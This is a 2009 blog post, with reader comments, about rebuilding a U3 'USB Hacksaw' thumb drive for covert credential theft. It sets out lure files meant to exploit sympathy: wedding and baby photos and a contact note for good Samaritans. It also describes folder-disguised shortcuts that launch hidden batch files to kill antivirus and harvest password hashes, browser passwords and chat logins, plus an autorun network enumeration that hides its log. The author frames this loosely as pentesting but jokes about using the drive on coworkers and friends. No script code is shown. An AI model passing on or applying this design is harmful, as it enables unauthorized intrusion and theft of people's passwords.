Tuesday, February 24, 2009

Recently a mate at work commented that he got a bit stuck with the whole U3 hacksaw / switchblade kurfuffle. Well I still had original my U3 set up from a couple of years ago after watching the Hak.5 show (Series 2 if your interested), but I thought it needed a bit of a refresh.

So what's the point to this I hear you ask, well after using my Hacksaw here and there and seeing it detected by AV now and then I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with DD and started a fresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB Enumerator.

With it looking like a brand new U3 this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well I can take advantage of this good nature by placing a file with a throw away email address in in the root called "Contact Me if Found.txt"

Now when it's found or handed in to a reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in (no metadata remember).

So what cold hearted person wouldn't want to return a USB Device with baby and wedding pics on right! Oh and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images) so it would have to be a cold hearted individual who is going to keep that USB drive.

Next I have a couple more directories.

Well they look like directories but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals its actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use paswords don't we.

When someone clicks on one of these 'shortcuts' it will place the running batch file to the back of any open windows and the only clue that anything is going on is a folder in the toolbar which will disapear after a few seconds.

And the batch file can do anything. Obviously I want to stop AV first, and then thanks to a few tools from Nirsoft as well as a few others from the likes of foofus I have loads of juicy details coming my way.

And what does this give me? Hashes, oh the lovely hashes.......

And of course we want the websites too.

And theres plenty more but I'm sure you get the point.

But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the auto run feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.

And the beauty of it all is it's just using Microsoft tools which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network and you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file that is in a deeply buried obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.

But what if autorun is disabled? Well just like the script that kills the AV and grabs the passwords this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.

So how can this be useful in a pentest? it could be that during that pentest you have social engineered your way onto a helpful persons PC who is going to print something off for you or email an important document for you and said files are on your USB device. Or you could hand a USB device to a receptionist to ask her to heck who's it is. Or of course you could just be transfering those picture or music files to your friends computer. So if your reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

Thanks for leaving a comment. For the script that kills the AV i simply took a script from moonlit on the Hak5 forum. a bit of Google magic on moonlit and hak5 should turn it up. I didn't realise that Metasploit had that in, i'll have to take a look and compare.

that's a very good point and one of the reasons why i would either have a USB key for enumeration (which wouldn't be picked up by AV and a restricted user can run the built in tools (usually) and then another USB key for the evil tools. Or another idea I'm playing with at the moment is having the evil tools in an encrypted truecrypt volume that doesn't get opened until the AV is off. I'll see where i get to with that but i'm sure its do-able.

i'll post up my evil tools script in the either tonight or in the week as a comment on this post.

Hi, I don't understand, you have the payload installed in the writable partition? I thought that the science of using a U3 was beeing abble to install the payload in the locked emulated CD drive so if the AV gets jumpy it won't be able to erase the files, and saving the log (logically) in the writable partition. help if i'm wrong, please. thanks for the info. it's still stealthy? the batch ran by the autorun.inf doesn't get picked up?cheers